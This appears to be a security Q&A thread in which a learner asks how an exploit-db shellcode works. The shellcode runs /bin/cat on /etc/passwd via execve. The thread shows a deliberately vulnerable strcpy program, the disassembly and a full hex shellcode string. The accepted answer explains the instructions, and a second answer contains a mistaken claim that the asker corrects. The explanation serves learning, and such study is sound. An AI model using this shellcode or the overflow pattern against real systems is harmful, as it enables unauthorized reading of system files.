What lies behind this complicated shellcode on linux?

Question

It's pretty much my first time playing around with a buffer overflow exploit. I've written a simple C program that is vulnerable to buffer overflows:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void main()
{
    char* filename = getenv("filename");
    char buff[128];

    strcpy(buff, filename);
}

I compiled it like this on my Ubuntu Server 10.04 (i386)

gcc vuln.c -o vuln -z execstack -fno-stack-protector

I tried to inject various types of shellcodes after finding out how many bytes are needed in filename to override the return address (So then I pass a NOP slide + a shellcode + address that leads to the NOP slide through the filename environment variable). Common variations of execve bin/sh resulted in a segmentation fault within their own code, for some reason, but one oddly specific shellcode really did work for me:

Taken from https://www.exploit-db.com/exploits/38116/ It calls upon execve to run /bin/cat on /etc/passwd

Disassembly of section .text:
08048060 <.text>:
 8048060:   eb 1f                   jmp    0x8048081
 8048062:   5b                      pop    %ebx
 8048063:   31 c0                   xor    %eax,%eax
 8048065:   88 43 0b                mov    %al,0xb(%ebx)
 8048068:   88 43 18                mov    %al,0x18(%ebx)
 804806b:   89 5b 19                mov    %ebx,0x19(%ebx)
 804806e:   8d 4b 0c                lea    0xc(%ebx),%ecx
 8048071:   89 4b 1d                mov    %ecx,0x1d(%ebx)
 8048074:   89 43 21                mov    %eax,0x21(%ebx)
 8048077:   b0 0b                   mov    $0xb,%al
 8048079:   8d 4b 19                lea    0x19(%ebx),%ecx
 804807c:   8d 53 21                lea    0x21(%ebx),%edx
 804807f:   cd 80                   int    $0x80
 8048081:   e8 dc ff ff ff          call   0x8048062
 8048086:   2f                      das    
 8048087:   2f                      das    
 8048088:   2f                      das    
 8048089:   2f                      das    
 804808a:   62 69 6e                bound  %ebp,0x6e(%ecx)
 804808d:   2f                      das    
 804808e:   63 61 74                arpl   %sp,0x74(%ecx)
 8048091:   23 2f                   and    (%edi),%ebp
 8048093:   2f                      das    
 8048094:   65 74 63                gs je  0x80480fa
 8048097:   2f                      das    
 8048098:   70 61                   jo     0x80480fb
 804809a:   73 73                   jae    0x804810f
 804809c:   77 64                   ja     0x8048102
 804809e:   23 41 4a                and    0x4a(%ecx),%eax
 80480a1:   49                      dec    %ecx
 80480a2:   54                      push   %esp
 80480a3:   48                      dec    %eax
 80480a4:   41                      inc    %ecx
 80480a5:   4a                      dec    %edx
 80480a6:   49                      dec    %ecx
 80480a7:   54                      push   %esp
 80480a8:   48                      dec    %eax
 80480a9:   4b                      dec    %ebx
 80480aa:   50                      push   %eax

Now, what you see here is objdump output and not the actual original assembly which I couldn't find. It seems like the /bin/cat and the /etc/passwd strings come after all those "2F" opcodes. A quick read-up on this opcode lead me to

Adjusts the result of the subtraction of two packed BCD values to create a packed BCD result.

I have no idea what that means, though, or how this contributes to the shellcode. Can anyone try to explain it?

Moreover, I wanted to adjust this shellcode just a bit, so it calls /bin/cat on a different file path other than /etc/passwd, such as /home/kfir/helloworld, but it'll be cut off at /home/kfir/ - which is the same length as /etc/passwd (11 characters)

score 4 · Accepted Answer · answered Mar 17 '17 at 22:33

If you have tried shellcode before which relies on absolute addresses, then that could explain the crashes. This shellcode survives because it uses call to obtain the absolute stack pointer address and then modifies the buffer in-place without other stack modifications.

For a full understanding, it might be illustrative to see what is happening, linearly:

8048060:    eb 1f                   jmp    0x8048081

Do a short, relative jump (eb) forward (current instruction pointer after executing instruction is 0x8048081 + 2, adding 0x1f to that gives 0x8048081 as next instruction).

8048081:    e8 dc ff ff ff          call   0x8048062

Call (e8) with an offset of -36 (signed integer of 0xffffffdc) relative to the next instruction at 0x8048081 + 5, yielding 0x8048062. Note that call pushes the next instruction (0x8048086) as return address on the stack.

8048062:    5b                      pop    %ebx
8048063:    31 c0                   xor    %eax,%eax

Remove the return address from the stack, storing 0x8048086 in the ebx register. Then it sets eax register to zero. Now, let's have a look at a hexadecimal dump of the data following that return address:

00000000: 2f2f 2f2f 6269 6e2f 6361 7423 2f2f 6574  ////bin/cat#//et
00000010: 632f 7061 7373 7764 2341 4a49 5448 414a  c/passwd#AJITHAJ
00000020: 4954 484b 50                             ITHKP

Clearly, these are not instructions, but the disassembler did not know that.

8048065:    88 43 0b                mov    %al,0xb(%ebx)

al is the 8-bit lower half of the eax register which contains zero, so this instruction overwrites the 11th position in the above data, replacing the # by a NUL byte (after ////bin/cat).

Why not encode the NUL byte directly in the data? Well, often the buffer is copied up to the first NUL byte, so if the shellcode contains a NUL byte, then it would not be fully copied. By encoding a dummy value and then overwriting it later, this limitation is avoided.

8048068:    88 43 18                mov    %al,0x18(%ebx)

Likewise, this sets the # in the second line to zero (after //etc/passwd).

804806b:    89 5b 19                mov    %ebx,0x19(%ebx)

This overwrites AJIT in the above data (at offset 0x19) with the address of the buffer (starting at ////bin/cat). Note that ebx is a 32-bit register, so indeed it overwrites four bytes.

804806e:    8d 4b 0c                lea    0xc(%ebx),%ecx
8048071:    89 4b 1d                mov    %ecx,0x1d(%ebx)

This loads the address of //etc/passwd (at offset 0xc) into the ecx register and then overwrites HAJI (at offset 0x1d) with this value.

8048074:    89 43 21                mov    %eax,0x21(%ebx)

Overwrites THKP (at offset 0x21) with four zero bytes.

Now, assume for the sake of the argument that our data (pointed to by the ebp register) is at the 32-bit address 0xffff0000. With the above modifications to the stack, our data now looks like this:

00000000: 2f2f 2f2f 6269 6e2f 6361 7400 2f2f 6574  ////bin/cat.//et
00000010: 632f 7061 7373 7764 0000 00ff ff0c 00ff  c/passwd........
00000020: ff00 0000 00                             .....

or, written in a more readable form with absolute memory addresses:

0xffff0000: "////bin/cat"
0xffff000c: "//etc/passwd"
0xffff0019: 0xffff0000 (address of first string, encoded in little-endian)
0xffff001d: 0xffff000c (address of second string)
0xffff0021: 0x00000000 (a NULL pointer)

Hmm, this looks like some arguments for the execve system call (sys_execve(char *filename, char **argv, char **envp)). For the x86 architecture, parameters are passed through the registers ebx, ecx, edx while the system call number is passed through the eax register. So our first argument (ebx) points to the ////bin/cat string (at 0xffff0000).

8048077:    b0 0b                   mov    $0xb,%al

Sets syscall number to 11 (sys_execve for x86).

8048079:    8d 4b 19                lea    0x19(%ebx),%ecx

Sets the second argument to the address of the arguments list (at 0xffff0019), in our case it contains two strings and a NULL pointer. (////bin/cat, //etc/passwd, NULL).

804807c:    8d 53 21                lea    0x21(%ebx),%edx

Sets the third argument to the address of the environment variables (at 0xffff0021), in our case it contains just a NULL terminator.

804807f:    cd 80                   int    $0x80

And finally invoke the syscall! Effectively, this code did the same as this C snippet:

char *argv[] = {
    "////bin/cat",
    "//etc/passwd",
    NULL
};
char *envp[] = {
    NULL
};
execve(argv[0], argv, envp);

Wow, thank you so much! This explanation sorts so many things for me. Although, I must wonder, is there any benefit using so many slashes (///bin)? — Kfir Eichenblat, Mar 18 '17 at 10:14
@Kfirprods One reason I can think of is alignment, but that should not be a problem on x86. Another possible reason is that removal of the extra slashes would modify the offsets which could then result in inclusion of `0a` (`\n`) or `0d` (`\r`). These characters (together with `00` (`\0`)) are often avoided since it causes truncation. — Lekensteyn, Mar 19 '17 at 12:07

DKNUCKLES · Answer 2 · 2017-03-17T15:23:08.663

The Assembly that you've posted is not the shellcode, as you mentioned but rather the unpacking and execution of the shell script.

The shellcode being executed is \xeb\x1f\x5b\x31\xc0\x88\x43\x0b\x88\x43\x18\x89\x5b\x19\x8d\x4b\x0c\x89\x4b\x1d\x89\x43\x21\xb0\x0b\x8d\x4b\x19\x8d\x53\x21\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x2f\x2f\x2f\x62\x69\x6e\x2f\x63\x61\x74\x23\x2f\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x23\x41\x4a\x49\x54\x48\x41\x4a\x49\x54\x48\x4b\x50

This shellcode looks to simply perform the /bin/cat /etc/passwd command and create a file named ajith and chmod it to 7775

Based on the code that exists on the Exploit-DB page it does not appear as though there is any "offset" of bits, it just runs the shellcode as is without trying to push it to a specific memory location. There does not appear to be a "buffer" offset in the C code, and based on your code it looks like your buffer is 128 bytes. As best I can tell your exploit code is not exploiting the buffer overflow vuln, it's just able to run because you have a 75 bit shellcode and a 128 byte buffer.

In a simple buffer overflow example you would throw a bunch of dummy characters to get you to the ESP register (let's say 128 A's in this instance), and then you would execute your shellcode. To find the correct position of the offset you'd have to fuzz the application (which you've done) and adjust your exploit accordingly.

In terms of generating your own shellcode, I would suggest looking at MSFVenom which will allow you to easily tailor your shellcode to execute the exact command you wish and attempt to create it with the smallest possible code length.

Perhaps i should have mentioned that in the question's body, but I am the one pushing it into a specific memory location. I pass a NOP slide, then this shellcode and then 4 bytes that affect eip and take it back into the somewhere within the NOP slide -> eventually executing this shellcode. However, my question is about the shellcode itself. How does it call /bin/cat? Normally I see shellcodes pushing their strings to the stack but I can't see that here — Kfir Eichenblat, Mar 17 '17 at 14:13
P.S, the shellcode does not create a file named ajith. It might say so in the comment on exploit-db, but he seems to have left it there after copy-pasting from another code sample. P.P.S, you said 'bits' various times when referring to bytes, just thought I should let you know — Kfir Eichenblat, Mar 17 '17 at 14:57
@Kfirprods thanks for the catch and the update re: the NOP slide. Truthfully reading Assembly is not my strong suit but I might try to watch this in a debugger when I get home and see if I can figure out what's going on. — DKNUCKLES, Mar 17 '17 at 15:24
awesome, thanks. I'm hoping someone with great assembly experience sees this thread and tells us what this shellcode is doing differently :) — Kfir Eichenblat, Mar 17 '17 at 15:46

What lies behind this complicated shellcode on linux?

2 Answers2